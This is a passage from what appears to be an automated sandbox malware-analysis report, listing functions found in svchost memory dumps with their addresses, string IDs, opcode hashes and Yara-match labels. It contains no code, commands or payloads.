                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                  • Instruction ID: a799be4487b597a356811bf0ba8f747b44f04ad4c5533c96b073fa64e1a2fe85
                                                                                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                  • Instruction Fuzzy Hash: 24516672A04345AFD721DE54CC44FAAB7B8FB84750F05092DFA80DB290DBB5EA14CB92
                                                                                                                  Function 03C4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: EXT-
                                                                                                                  • API String ID: 0-1948896318
                                                                                                                  • Opcode ID: 0200ea529325244b393a737650f9485cba1dd6f3ab1f63c0ddf4fea734fc16e9
                                                                                                                  • Instruction ID: 4335949ac091f3bb2257cc2a482c11d74beba7f38266440c0ead934b456c19ab
                                                                                                                  • Opcode Fuzzy Hash: 0200ea529325244b393a737650f9485cba1dd6f3ab1f63c0ddf4fea734fc16e9
                                                                                                                  • Instruction Fuzzy Hash: F841B0765083519BD710DB75C984B6BB7E8BF88714F060E2DF984DB180EB74DA04C796
                                                                                                                  Function 00401130 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: VUUU
                                                                                                                  • API String ID: 0-2040033107
                                                                                                                  • Opcode ID: aae79b698365045de7b712a1709c4bb73174b221727c3b144b45787120d9f0ba
                                                                                                                  • Instruction ID: f77cb7aa7326d82c03783e126e2f2ec5b482876dd80eec12db98c44f6d41fb92
                                                                                                                  • Opcode Fuzzy Hash: aae79b698365045de7b712a1709c4bb73174b221727c3b144b45787120d9f0ba
                                                                                                                  • Instruction Fuzzy Hash: 3D41C771B0010A07DB1C485DDDA06A66657C7E8399B5CC17FEE1AEF7E5E878AD028388
                                                                                                                  Function 00402DC0 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: gfff
                                                                                                                  • API String ID: 0-1553575800
                                                                                                                  • Opcode ID: fbd406f5236462b4423dd9dfc36f178eded7f330d930c9420be446c12b7a2fd0
                                                                                                                  • Instruction ID: eca0d2927990a4488b5422bf74d63da1aff9b3d6c82c9f431e7a7205390c54f6
                                                                                                                  • Opcode Fuzzy Hash: fbd406f5236462b4423dd9dfc36f178eded7f330d930c9420be446c12b7a2fd0
                                                                                                                  • Instruction Fuzzy Hash: 12415C31B0455D47CB158D6DCD852E97B62EBD4304F5882BAD958EB3C0D5B89E0687C0
                                                                                                                  Function 00402DB9 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: gfff
                                                                                                                  • API String ID: 0-1553575800
                                                                                                                  • Opcode ID: 96085eb1971034f640f61c826ca22e694d4e381f433487a18ada4c4924cdcd43
                                                                                                                  • Instruction ID: 76e77bb87408a581804a46fe916a57c3057a1df2955af11f09c767623566de56
                                                                                                                  • Opcode Fuzzy Hash: 96085eb1971034f640f61c826ca22e694d4e381f433487a18ada4c4924cdcd43
                                                                                                                  • Instruction Fuzzy Hash: 8B417D31A0455D47CB188D6DCD852E9BB62EFD0304F1882BBD958EB3C1D5B89E0687C0
                                                                                                                  Function 03CEB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PreferredUILanguages
                                                                                                                  • API String ID: 0-1884656846
                                                                                                                  • Opcode ID: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                                                                                                  • Instruction ID: 4b28760c5f2d574f4213d36b3fc4bf5ebb85770cd9caf03d0f8c2a51e9bf6f07
                                                                                                                  • Opcode Fuzzy Hash: 810c034543dd00fee494f1a6761da91e0b247cb54dec8a6bd59465c84adc0f75
                                                                                                                  • Instruction Fuzzy Hash: 6A41C476D04219ABCF11DA95C841BFEF7B9EF44750F050166E911EF254DAB4DE40C7A0
                                                                                                                  Function 03CAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: BinaryHash
                                                                                                                  • API String ID: 0-2202222882
                                                                                                                  • Opcode ID: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                                                                                                  • Instruction ID: 78e54c4b5aba878866798ae7a5e83c245f2b725816f6fa7ea74367d5daf8b567
                                                                                                                  • Opcode Fuzzy Hash: 430cc3a3e55188feac1b2f015b2d9fe2b94c824a6a38076275052869432745e2
                                                                                                                  • Instruction Fuzzy Hash: 9B4165B6D0062DAADB21DB54CC84FDEB77CAB44718F0185E5EA08EB140DB709E889F94
                                                                                                                  Function 03CB97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: verifier.dll
                                                                                                                  • API String ID: 0-3265496382
                                                                                                                  • Opcode ID: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                                                                                                  • Instruction ID: 1691e3386777735eecd9dd06246a70f5f48663393301029ff1bc56ce94eb5263
                                                                                                                  • Opcode Fuzzy Hash: a9894b34153a67b0722c8a6172caefa9a7a06d24d795b1cb1d453bea08886d9f
                                                                                                                  • Instruction Fuzzy Hash: 11319376A003119FDB24DF69A850B76B7F6EF5A314F598079E608DF391E7328E808790
                                                                                                                  Function 03C636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Flst
                                                                                                                  • API String ID: 0-2374792617
                                                                                                                  • Opcode ID: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                                                                                                  • Instruction ID: befa988da6598c5e9ce8788fe5bc9880c0530d25e80c7e810e4ab6897dead9ef
                                                                                                                  • Opcode Fuzzy Hash: 2d1d877e8147a58199ad53010722fab38f55da189a6406a133c71cfc460cab22
                                                                                                                  • Instruction Fuzzy Hash: B34198B56053019FC314CF19D2C0A16FBE4EF89714F18856EE44ACF291DB71DA42CB91
                                                                                                                  Function 03C35096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Actx
                                                                                                                  • API String ID: 0-89312691
                                                                                                                  • Opcode ID: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                                                                                                  • Instruction ID: 51aa2605a9077e87c9f14c27988b2a49acaa07c69dc42279b2c9ebeb88ca2e48
                                                                                                                  • Opcode Fuzzy Hash: 8e461a6b7e4b441228d2f6761f3533095b7632f66fe3d05b79a50c21420d3f45
                                                                                                                  • Instruction Fuzzy Hash: 4C1182307096528BEB24C91E88546B6F2D9EB97264F3C852AE462CF391D673DD418780
                                                                                                                  Function 03C6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2f7c87b017e63eb1d37c46f99fb574e988fe9e4c6e26dd43fd6ea7f968834a65
                                                                                                                  • Instruction ID: 77e2d6e610ac0f751d21e36ed232b59c106f730ce7cbada229b736d6be9c1ad8
                                                                                                                  • Opcode Fuzzy Hash: 2f7c87b017e63eb1d37c46f99fb574e988fe9e4c6e26dd43fd6ea7f968834a65
                                                                                                                  • Instruction Fuzzy Hash: 23822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB345DA34AC568B45
                                                                                                                  Function 03C7516C Relevance: .8, Instructions: 785COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e8951be3170c0f1d402c877f11a9390d45954068cf374fa42594c689c5ab8496
                                                                                                                  • Instruction ID: 621660b7852f931ecb883d1f6bb2267c3c783f2d6b5b3b6c9bc10abaac333aeb
                                                                                                                  • Opcode Fuzzy Hash: e8951be3170c0f1d402c877f11a9390d45954068cf374fa42594c689c5ab8496
                                                                                                                  • Instruction Fuzzy Hash: 54628D7690464AAFCF24CF18D4905AEFB62BA56314F49C69CCC9AEB604D731BA44CBD0
                                                                                                                  Function 03C8739A Relevance: .7, Instructions: 705COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                                                                                                  • Instruction ID: beb68af9dd1063871adc36d8ded1ce583a87e2c686d53affaa9ebc4275dd1edf
                                                                                                                  • Opcode Fuzzy Hash: b840e4733519fadc3d9307634be246aea2f36b6c202992ccd72977f2bb4e50fe
                                                                                                                  • Instruction Fuzzy Hash: 4A429175A006168FDB15EF59C4806BEF7B6FF88318B28856DD552EB340E734EA42CB90
                                                                                                                  Function 03C85AA0 Relevance: .7, Instructions: 652COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                  • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                  • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                  • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                  Function 03C5B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                                                                                                  • Instruction ID: 77b09d09677fc85c6ab31df57f2df1c4936ad803d6b7002ea21d41b0b8aa1c2f
                                                                                                                  • Opcode Fuzzy Hash: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                                                                                                  • Instruction Fuzzy Hash: D7329976E002199BCF24DFA8C884AAEBBB1FF54714F190029EC05EB381EB359D41CB94
                                                                                                                  Function 03C42840 Relevance: .6, Instructions: 605COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 049e87d4e451a4083991cb2db1116da627717ee9c7cd5c8951fc22d8579f314a
                                                                                                                  • Instruction ID: e8605782b5a4978f14ce85bad56ed8af3f2f6184850bbd4d5c87c7154d6ee156
                                                                                                                  • Opcode Fuzzy Hash: 049e87d4e451a4083991cb2db1116da627717ee9c7cd5c8951fc22d8579f314a
                                                                                                                  • Instruction Fuzzy Hash: BD320E74A007558BEF24CF6AC8487BEFBF6AF84320F1A455AE446DF284D735A921CB50
                                                                                                                  Function 03CDA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                                                                                                  • Instruction ID: 64f2683dfbd8f484c7e36b3ae689a9b624088853f97251c668ef6c63b7a3c77c
                                                                                                                  • Opcode Fuzzy Hash: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                                                                                                  • Instruction Fuzzy Hash: E422AD78204651CFDB24CF2AC094772B7F1AF45300F18889AFA96CF685E735E692DB61
                                                                                                                  Function 03CF16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                                                                                                  • Instruction ID: 0efa3fa15b15182e0a8be9f85d01267a049cd5cfb1fa2c26033f31bb78de6074
                                                                                                                  • Opcode Fuzzy Hash: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                                                                                                  • Instruction Fuzzy Hash: A5228035A00216CFCB59CF59C490AAAF7B6FF88314B2D456DDA56DF344DB30AA41CB90
                                                                                                                  Function 03C5FB80 Relevance: .6, Instructions: 559COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 240b4920a2ddec6e511c4b7b971baa932756a04fbb1e6775d05e48a26fbdc642
                                                                                                                  • Instruction ID: dfb54ad5c3e970a727378f14fce1b0289943fe7c6e2ccc0a9e19560a6a4fa58b
                                                                                                                  • Opcode Fuzzy Hash: 240b4920a2ddec6e511c4b7b971baa932756a04fbb1e6775d05e48a26fbdc642
                                                                                                                  • Instruction Fuzzy Hash: 7C22D37590061AEFDB14DFA8C880BAEB7B5FF44358F1485A9E814DF245E730EA85CB90
                                                                                                                  Function 03CF1D5A Relevance: .6, Instructions: 559COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f485338e28e3e8b780df10c6e0bdd7e34c191df7c5478d8b57fedf25a77a8585
                                                                                                                  • Instruction ID: bb8842610aec8f10f225b703fc5ade8496177a63d353b9a12676664c6f34722f
                                                                                                                  • Opcode Fuzzy Hash: f485338e28e3e8b780df10c6e0bdd7e34c191df7c5478d8b57fedf25a77a8585
                                                                                                                  • Instruction Fuzzy Hash: 4122A0396047128FC759CF29C490A2AF3E5FF88314B198A6DEA96CF351D730E946CB91
                                                                                                                  Function 03C58DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 19ad5b167e43cc9a51cb77d41b2704fd78edf76dbf7847f2aece7d52f87feb43
                                                                                                                  • Instruction ID: 9d61acf876348ec261f6e80cb6f73a466d91dd2ff633a283da447a94123f8716
                                                                                                                  • Opcode Fuzzy Hash: 19ad5b167e43cc9a51cb77d41b2704fd78edf76dbf7847f2aece7d52f87feb43
                                                                                                                  • Instruction Fuzzy Hash: 41225E74E00216DBDF14CF95C4849BEFBF6BF48704B19819AE846EB241E774EA81CB64
                                                                                                                  Function 03CF2446 Relevance: .5, Instructions: 485COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2858f221d82e5dea364321fa68a241d704ba14e4d5be273df83f245aab8ff58e
                                                                                                                  • Instruction ID: 0c20314ab419698c5892a2f7b87591e97b45e0e65ace7d5cc5c4af929b50604e
                                                                                                                  • Opcode Fuzzy Hash: 2858f221d82e5dea364321fa68a241d704ba14e4d5be273df83f245aab8ff58e
                                                                                                                  • Instruction Fuzzy Hash: 660204796046518FDBA4CF2AC450375FBF1EF85300B19899AEAD6CF281D734EA42DB60
                                                                                                                  Function 03D0B16B Relevance: .4, Instructions: 450COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 54927d9dc4ad27ff5527c6dc0caa83e755990f2780f6c778783c7222936e7a85
                                                                                                                  • Instruction ID: 2fb3835cefedcf4f5160eb4aaa2ba4f99a794f9eaac93e729dd011a9e1c6e483
                                                                                                                  • Opcode Fuzzy Hash: 54927d9dc4ad27ff5527c6dc0caa83e755990f2780f6c778783c7222936e7a85
                                                                                                                  • Instruction Fuzzy Hash: D7F1E572E046118BCB18CFB9C9A077EFBF5EF98600719416AD4A6DB3C0D674EA41CB90
                                                                                                                  Function 00410223 Relevance: .4, Instructions: 435COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                  • Instruction ID: 301f0cab8a4d95ba33e47b9ec59fafbc0dd6ec4052c6a3bd7b89603ff8f4570c
                                                                                                                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                  • Instruction Fuzzy Hash: E6026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                                  Function 03D0A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 05ad5870a95c0dec24100b27634f4e8665db5764e8f9d177e7894394216b9e57
                                                                                                                  • Instruction ID: 67742d581f7ca19ccbd65b9e80646d9f10d785d3794b6141b6bd11a4e304851f
                                                                                                                  • Opcode Fuzzy Hash: 05ad5870a95c0dec24100b27634f4e8665db5764e8f9d177e7894394216b9e57
                                                                                                                  • Instruction Fuzzy Hash: DEF1D677E006269BCB18CE68C5A06BDFBF5EF45610B1A426AD856EB3C0D734DE41CB90
                                                                                                                  Function 03C5FDC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 58e89fd9b27b4f16369ee6e9f8d42b6c93f2d583326aa24f2aa84c0c06bb0714
                                                                                                                  • Instruction ID: 4a3fa9e4b51e49539424323f0f4ef2be45b5a5e7a903ef397266288da4392617
                                                                                                                  • Opcode Fuzzy Hash: 58e89fd9b27b4f16369ee6e9f8d42b6c93f2d583326aa24f2aa84c0c06bb0714
                                                                                                                  • Instruction Fuzzy Hash: DBF1917490061ADFDB14DFA8C880BAEB7B5FF48308F1885A9E815DB345E734DA85CB90
                                                                                                                  Function 03C28397 Relevance: .4, Instructions: 380COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                                                                                  • Instruction ID: a9ceee2fd36f8d5c220c0074a4cc8a1b4b06f0ee7f88a381e489b7d4631cc9e9
                                                                                                                  • Opcode Fuzzy Hash: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                                                                                                  • Instruction Fuzzy Hash: 4CD1C475A007269BCF14EF65C890ABABBB5BF44708F094629F915DF280EB34EA45CB50
                                                                                                                  Function 03C5C6E0 Relevance: .4, Instructions: 367COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dcf7e154ba3d11db12221a79477c9d077c09de4965553be051bdbd2eb90796dd
                                                                                                                  • Instruction ID: 2a4a86ed1cb7e697710a7a7c0f4162716b8915deaaea04eeb9b21f1541bace45
                                                                                                                  • Opcode Fuzzy Hash: dcf7e154ba3d11db12221a79477c9d077c09de4965553be051bdbd2eb90796dd
                                                                                                                  • Instruction Fuzzy Hash: 29D14C72E043198BDF28CA99C5843BDBBB5FB54344F19C06AE842EB695D7748AC1CB48
                                                                                                                  Function 03C438E0 Relevance: .3, Instructions: 349COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
